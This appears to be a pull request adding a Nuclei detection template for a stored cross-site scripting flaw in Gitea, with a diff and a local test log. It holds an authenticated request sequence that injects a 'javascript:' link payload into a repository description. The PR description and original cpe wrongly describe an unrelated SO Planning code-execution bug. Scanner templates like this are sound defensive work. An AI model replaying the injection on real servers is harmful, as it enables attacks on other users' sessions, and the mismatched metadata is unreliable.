### PR TITLE
Create CVE-2024-6886

### DIFF
--- a/http/cves/2024/CVE-2024-6886.yaml
+++ b/http/cves/2024/CVE-2024-6886.yaml
@@ -1,23 +1,26 @@
 id: CVE-2024-6886
 
 info:
-  name: Gitea - XSS Vulnerability Exploit
+  name: Gitea 1.22.0 - Cross-Site Scripting
   author: soonghee2
-  severity: high
+  severity: medium
   description: |
-     Gitea 1.22.0 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session.
-  reference: |
-      - https://www.exploit-db.com/exploits/52077
-      - https://nvd.nist.gov/vuln/detail/CVE-2024-6886
-  classification: 
-    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
-    cvss-score: 10.0
+    Gitea 1.22.0 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session.
+  reference:
+    - https://www.exploit-db.com/exploits/52077
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-6886
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:L
+    cvss-score: 6.7
     cve-id: CVE-2024-6886
     cwe-id: CWE-79
-    epss-score: 0.00043
-    epss-percentile: 0.11431
-    cpe: cpe:2.3:a:soplanning:soplanning:*:*:*:*:*:*:*:*
-  tags: cve,cve2024,gitea,xss
+    cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 4
+    vendor: gitea
+    product: gitea
+  tags: cve,cve2024,gitea,xss,authenticated
 
 variables:
   username: "{{username}}"
@@ -31,7 +34,7 @@ http:
         Content-Type: application/x-www-form-urlencoded
 
         user_name={{username}}&password={{password}}
-      
+
       - |
         GET / HTTP/1.1
         Host: {{Hostname}}
@@ -44,18 +47,30 @@ http:
         POST /repo/create HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
-        Connection: keep-alive
 
-        repo_name={{randstr}}&description=<a href=javascript:alert(1)>XSS test{{randstr}}</a>&_csrf={{csrf_token}}&uid={{uid_name}}
-      
+        repo_name={{randstr}}&description=<a%20href="javascript:alert(document.domain)">XSS</a>&_csrf={{csrf_token}}&uid={{uid_name}}
+
       - |
         GET /{{username}} HTTP/1.1
         Host: {{Hostname}}
 
+    matchers-condition: and
     matchers:
       - type: word
+        part: body_5
         words:
-          - '<a href="javascript:alert(1)">XSS test{{randstr}}</a>'
+          - '<a href="javascript:alert(document.domain)">XSS</a>'
+          - 'gitea'
+        condition: and
+
+      - type: word
+        part: header_5
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
 
     extractors:
       - type: regex

--- a/http/cves/2024/CVE-2024-6886.yaml
+++ b/http/cves/2024/CVE-2024-6886.yaml
@@ -1,0 +1,73 @@
+id: CVE-2024-6886
+
+info:
+  name: Gitea - XSS Vulnerability Exploit
+  author: soonghee2
+  severity: high
+  description: |
+     Gitea 1.22.0 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session.
+  reference: |
+      - https://www.exploit-db.com/exploits/52077
+      - https://nvd.nist.gov/vuln/detail/CVE-2024-6886
+  classification: 
+    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
+    cvss-score: 10.0
+    cve-id: CVE-2024-6886
+    cwe-id: CWE-79
+    epss-score: 0.00043
+    epss-percentile: 0.11431
+    cpe: cpe:2.3:a:soplanning:soplanning:*:*:*:*:*:*:*:*
+  tags: cve,cve2024,gitea,xss
+
+variables:
+  username: "{{username}}"
+  password: "{{password}}"
+
+http:
+  - raw:
+      - |
+        POST /user/login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        user_name={{username}}&password={{password}}
+      
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /{{username}} HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /repo/create HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Connection: keep-alive
+
+        repo_name={{randstr}}&description=<a href=javascript:alert(1)>XSS test{{randstr}}</a>&_csrf={{csrf_token}}&uid={{uid_name}}
+      
+      - |
+        GET /{{username}} HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        words:
+          - '<a href="javascript:alert(1)">XSS test{{randstr}}</a>'
+
+    extractors:
+      - type: regex
+        name: csrf_token
+        group: 1
+        regex:
+          - 'name="_csrf" value="([^"]+)"'
+        internal: true
+
+      - type: regex
+        name: uid_name
+        group: 1
+        regex:
+          - '"uid":\s*(\d+)'
+        internal: true


### PR DESCRIPTION
### Template / PR Information

Added CVE-2024-6886

```
An authenticated Remote Code Execution (RCE) vulnerability is found in the SO Planning online planning tool. If the public view setting is enabled, a attacker can upload a PHP-file that will be available for execution for a few milliseconds before it is removed, leading to execution of code on the underlying system. The vulnerability has been remediated in version 1.52.02.
```
- References:
  - https://www.exploit-db.com/exploits/52077
  - https://nvd.nist.gov/vuln/detail/CVE-2024-6886

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


```
POST /user/login HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Connection: close
Content-Length: 35
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

user_name=user3&password=user3user3
[[34mVER[0m] [CVE-2024-6886] Sent HTTP request to http://localhost:3000/user/login
[[35mDBG[0m] [CVE-2024-6886] Dumped HTTP response http://localhost:3000/user/login

HTTP/1.1 303 See Other
Connection: close
Content-Length: 0
Cache-Control: max-age=0, private, must-revalidate, no-transform
Date: Sat, 25 Jan 2025 13:25:51 GMT
Location: /
Set-Cookie: i_like_gitea=25d77704be04d6ab; Path=/; HttpOnly; SameSite=Lax
Set-Cookie: _csrf=GBSnYj265488F9fTPLfq7aUOzFs6MTczNzgxMTU1MTg4MjExMzI2OA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
Set-Cookie: i_like_gitea=4d74d1b154f6011b; Path=/; HttpOnly; SameSite=Lax
Set-Cookie: lang=en-US; Path=/; HttpOnly; SameSite=Lax
Set-Cookie: _csrf=; Path=/; Max-Age=0; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN

[[34mINF[0m] [CVE-2024-6886] Dumped HTTP request for http://localhost:3000/

GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Connection: close
Cookie: i_like_gitea=4d74d1b154f6011b; lang=en-US
Accept-Encoding: gzip

[[34mVER[0m] [CVE-2024-6886] Sent HTTP request to http://localhost:3000/
[[35mDBG[0m] [CVE-2024-6886] Dumped HTTP response http://localhost:3000/


HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Cache-Control: max-age=0, private, must-revalidate, no-transform
Content-Type: text/html; charset=utf-8
Date: Sat, 25 Jan 2025 13:25:52 GMT
X-Frame-Options: SAMEORIGIN
...
...
....
				
					<div class="flex-item-body"><a href="javascript:alert(1)">XSS test2s7fQJk7ykXnuNjD9S0a5B6bmAj</a></div>
				
			

[[92mCVE-2024-6886[0m:[1;92mword-1[0m] [[94mhttp[0m] [[38;5;208mhigh[0m] http://localhost:3000/user3

```
![image](https://github.com/user-attachments/assets/eb1739ef-93b9-4108-b20c-5eef6badbe0e)